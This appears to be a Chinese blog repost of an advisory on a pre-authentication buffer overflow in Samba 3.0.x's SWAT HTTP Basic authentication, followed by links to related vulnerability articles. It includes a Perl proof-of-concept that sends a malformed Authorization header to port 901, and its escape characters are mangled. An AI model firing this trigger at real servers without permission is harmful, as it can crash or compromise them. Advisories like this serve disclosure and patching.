Samba 3.x SWAT预验证远程缓冲区溢出漏洞[代码]

最新推荐文章于 2022-12-24 18:09:05 发布
最新推荐文章于 2022-12-24 18:09:05 发布
阅读量724 收藏
点赞数
分类专栏: 技术文档 入侵技术文档 源代码文档 LINUX/UNIX/MINX 文章标签: authorization basic socket security buffer linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/superhacker110/article/details/193124
版权

Samba 3.x SWAT预验证远程缓冲区溢出漏洞[代码]

受影响系统

Samba 3.0.2
               Samba 3.0.3
               Samba 3.0.4

详细描述
SWAT是Samba Web管理工具。

Samba SWAT服务预验证存在缓冲区溢出问题,远程攻击者可以利用这个漏洞在系统上以SWAT进程权限执行任意指令。问题存在于source/lib/util_str.c文件中的进行HTTP Basic验证的base64_decode_data_blob函数中.

测试代码
#!/usr/bin/perl
# Samba 3.0.4 and prior's SWAT Authorization Buffer Overflow
# Created by Noam Rathaus of Beyond Security Ltd.
#

use IO::Socket;
use strict;

my $host = $ARGV[0];

my $remote = IO::Socket::INET->new ( Proto => "tcp", PeerAddr => $host, PeerPort => "901" );

unless ($remote) { die "cannot connect to http daemon on $host" }

print "connected/n";

$remote->autoflush(1);

my $http = "GET / HTTP/1.1/r
Host: $host:901/r
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7) Gecko/20040712 Firefox/0.9.1/r
Accept: text/xml/r
Accept-Language: en-us,en;q=0.5/r
Accept-Encoding: gzip,deflate/r
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7/r
Keep-Alive: 300/r
Connection: keep-alive/r
Authorization: Basic =/r
/r
";

print "HTTP: [$http]/n";
print $remote $http;
sleep(1);
print "Sent/n";

while (<$remote>)
{
print $_;
}
print "/n";

close $remote;

Samba远程崩溃或代码执行漏洞(CVE-2015-0240)简要分析
Traxer的学习之路
03-07 4196
Samba远程崩溃或代码执行漏洞(CVE-2015-0240)1.搭建samba环境注意:在Linux系统上使用源码编译来安装samba必须要将系统自带的全部关于samba的软件均删除,可用如下命令查看已安装的samba软件:[bb@localhost bin]$ rpm -qa | grep samba samba-common-3.6.23-14.el6_6.x86_64 samba-winbi
linux远程安全模式绕过,Samba SWAT操作限制绕过漏洞(CVE-2011-2522)
weixin_42316909的博客
05-08 238
发布日期:2011-07-27更新日期:2011-07-27受影响系统:Samba Samba 3.x描述:--------------------------------------------------------------------------------BUGTRAQ ID: 48899CVE ID: CVE-2011-2522Samba是一套实现SMB(Server Messag...
Metasploit学习笔记(三)——Samba 3.x服务漏洞复现
Zichel77的博客
10-07 775
享文件和打印机的通信协议,它在局域网内使用Linux和Windows系统的机器之间提供文件及打印机等资源的共享服务。尝试别的exploit或者payload也不太行,但这里主要是把过程过一遍,和永恒之蓝的利用步骤完全一样。因为目标是Linux机器,一定要选择Linux的攻击载荷,而且不是每个都有用的,可以一个个尝试一下。此步就是收集主机的信息,得知445端口开放,就可以利用基于该端口的相关漏洞。然后选择Rank为excellent并且时间较新的加以利用,以提高渗透成功率。本次利用选择的是13号。
samba 3.x提权漏洞
→_→
08-17 1364
声明:以下内容均来自“实验吧”免费公益渗透平台,该平台至今仍旧在维护,估计~~,为此把以前保留的笔记拿来分享下。 [实验目的] 1) 利用Samba漏洞,获得目标主机root权限 [实验原理] 1) Samba中负责在SAM数据库更新用户口令的代码未经过滤便将用户输入传输给了/bin/sh.如果再调用smb.conf中定义的外部脚本时,通过对/bin/sh的MS-RPC调用提交了而已输入的话,就可能允许攻击者以nobody用户的权限执行任意命令.Samba服务端口:139\445. ...
攻击linuxsamba,Samba 中间人攻击漏洞(CVE-2015-5296)
weixin_33608760的博客
05-17 300
Samba 中间人攻击漏洞(CVE-2015-5296)发布日期:2015-12-19更新日期:2016-01-01受影响系统:Samba Samba 4.x-4.1.22Samba Samba 4.3.x-4.3.3Samba Samba 4.2.x-4.2.7Samba Samba 3.x描述:CVE(CAN) ID: CVE-2015-5296Samba是在Linux和UNIX系统上实现SM...
Samba_3.x_4.x_Exploit:不使用Metasploit-Framework的Samba 3.x 4.x的利用
02-10
Samba_3.x_4.x_Exploit(SMB“用户名映射脚本”) 利用“ Samba用户名映射脚本命令执行”的Metasploit模块的python版本,我创建了该脚本以避免使用Metasploit,因为它对学习没有用。 :alien_monster:
samba-4.10.16.rar
12-14
Samba是一款开源软件,它使得Linux/Unix系统能够与Microsoft Windows网络无缝集成,提供文件和打印服务。在本文中,我们将深入探讨Samba 4.10.16的安装过程,以及它在IT环境中的关键作用。 1. **Samba简介** Samba...
Linux环境下Samba远程代码执行漏洞探析.pdf
09-06
"Linux环境下Samba远程代码执行漏洞探析" 本文探讨了 Linux 环境下 Samba 远程代码执行漏洞的成因、影响版本、利用条件和防范措施。SambaLinux 和 UNIX 系统的 SMB 协议服务软件,可以实现与其他操作系统(如...
Linux下的文件共享服务器Samba安装文件及其配置说明 samba-4.14.5.tar
09-28
3. 下载Samba源码包: 题目提供的压缩包是`samba-4.14.5.tar.gz`,你需要先将其解压: ``` tar -zxvf samba-4.14.5.tar.gz cd samba-4.14.5 ``` 4. 编译和安装Samba: 执行以下命令编译并安装Samba: ``` ....
linux samba 漏洞 exp,smaba漏洞总结
weixin_39816448的博客
05-20 1799
由于我无法确定具体影响的具体版本,所以samba版本在4.6.4之下都视为有漏洞存在。1,Samba任意文件访问漏洞(CNA-2004-0815)漏洞简介Samba是一个开源/免费软件套件,为SMB / CIFS客户提供无缝文件和打印服务。远程利用Samba中的输入验证漏洞允许攻击者访问指定共享路径之外的文件和目录。漏洞利用条件漏洞使用了samba软件套件,通常在445端口或者139端口。影响版本...
永恒之蓝ms17-0109(缓冲区溢出漏洞)
最新发布
weixin_53711701的博客
12-24 1501
永恒之蓝ms17-0109(缓冲区溢出漏洞)
Samba修复严重漏洞,可导致DoS和RCE
smellycat000的专栏
11-21 529
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士上周,Samba修复了一个整数溢出漏洞 (CVE-2022-42898),可能导致任意代码执行。Samba 是一款适用于Linux 和 Unix 系统的开源SMB实现,可用作活动目录域控制 (AD DC)。该漏洞影响多个Samba 发布,存在于Service for User to Proxy (S4U2proxy) 句柄中,该句柄用于以用户身份...
win10到2008服务器smb协议,【漏洞警】Windows 10和Server版本SMBv3协议高危漏洞
weixin_30569923的博客
08-05 703
Windows 10和Server版本SMBv3协议高危漏洞风险提示:【漏洞公告】2020年3月10日,微软官方更新发布了3月安全更新补丁和针对Windows 10/Server禁用SMBv3(SMB 3.1.1版本)协议压缩的指南公告,以此缓解SMBv3协议在处理调用请求时的一个远程执行代码漏洞,公告编号:ADV200005(暂未更新CVE-2020-0796页面),相关链接:https://p...
20210130Mikrotik路由器SMB缓冲区溢出漏洞(CVE-2018-7445)复现
qq_45290991的博客
02-01 2511
终于考完了大学最后需要考试的三门课,结果突然间通知不能放假,并且还要封口,那我没办法,只好开始了毕设,老师让先复现几个路由器的漏洞,然后学学《家用路由器0day漏洞》。所以,我们开始吧,我参考了如下几篇博客,间接感谢大佬的智慧: 大纲资料:https://blog.csdn.net/qq_41453285/article/details/102154900 漏洞简述:https://www.coresecurity.com/core-labs/advisories/mikrotik-route...
go与http协议
sinat_26682309的博客
05-01 1581
http请求流程 在浏览器地址栏键入URL,按下回车之后会经历以下流程: 1、浏览器向 DNS 服务器请求解析该 URL 中的域名所对应的 IP 地址; 2、解析出 IP 地址后,根据该 IP 地址和默认端口 80,和服务器建立TCP连接; 3、浏览器发出读取文件(URL 中域名后面部分对应的文件)的HTTP 请求,该请求报文作为TCP 三次握手的第三个报文的数据发送给服务器; ...
CVE-2019-0708漏洞分析
热门推荐
qq_44465615的博客
11-14 1万+
CVE-2019-0708漏洞分析 注:仅供学习用途,利用于非法行为者与本文作者无关 第一章 CVE-2019-0708漏洞说明 §1.1 漏洞概述 2019年5月14日,微软发布了针对远程桌面服务的关键远程执行代码漏洞CVE-2019-0708的补丁,该漏洞影响某些旧版本的windows。攻击者一旦成功触发该漏洞,便可以在目标系统上执行任意代码,该漏洞的触发无需任何用户交互操作。这意味着,存在漏洞的计算机只要联网,无需任何操作,就可能遭遇黑客远程攻击,运行恶意代码。其方式与2017年的 WannaCry
NFC竟也存在高危漏洞?看他如何分析(CVE-2021-0870)
Moyun_vackbot的博客
01-21 3988
概述 NFC在人们的日常生活中扮演了重要角色,已经成为移动设备不可或缺的组件,NFC和蓝牙类似,都是利用无线射频技术来实现设备之间的通信。因此芯片固件和主机NFC子系统都是远程代码执行(RCE)攻击的目标。 CVE-2021-0870是一枚NFC中的RCE高危漏洞,2021年10月漏洞通告中显示已被修复https://source.android.com/security/bulletin/2021-10-01。漏洞成因是RW_SetActivatedTagType 可以通过将NFC的TCB(tag c
2020-09 补丁日: 微软多个产品高危漏洞安全风险通告
爱国小白帽
09-11 998
360CERT [三六零CERT](javascript:void(0)???? 前天 报告编号:B6-2020-090901 报告来源:360CERT 报告作者:360CERT 更新日期:2020-09-09 0x01 事件简述 2020年09月09日,360CERT监测发现 微软官方 发布了 9月份的风险通告,事件等级:严重,事件评分:10。 此次安全更新发布了 129 个漏洞的补丁,主要涵盖了 Windows操作系统、IE/Edge浏览器、ChakraCore、SQL Server、Office 组
三星S3C44B0X:高性能RISC处理器与SAMBA2总线技术
"S3C44B0X是一款由三星推出的16/32位RISC处理器,旨在为手持设备提供高效能、低成本的解决方案。它包含2.5V ARM7TDMI内核,配备8K缓存,并具有丰富的外设接口,如LCD控制器、UART、DMA通道、外部内存控制器、PWM...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值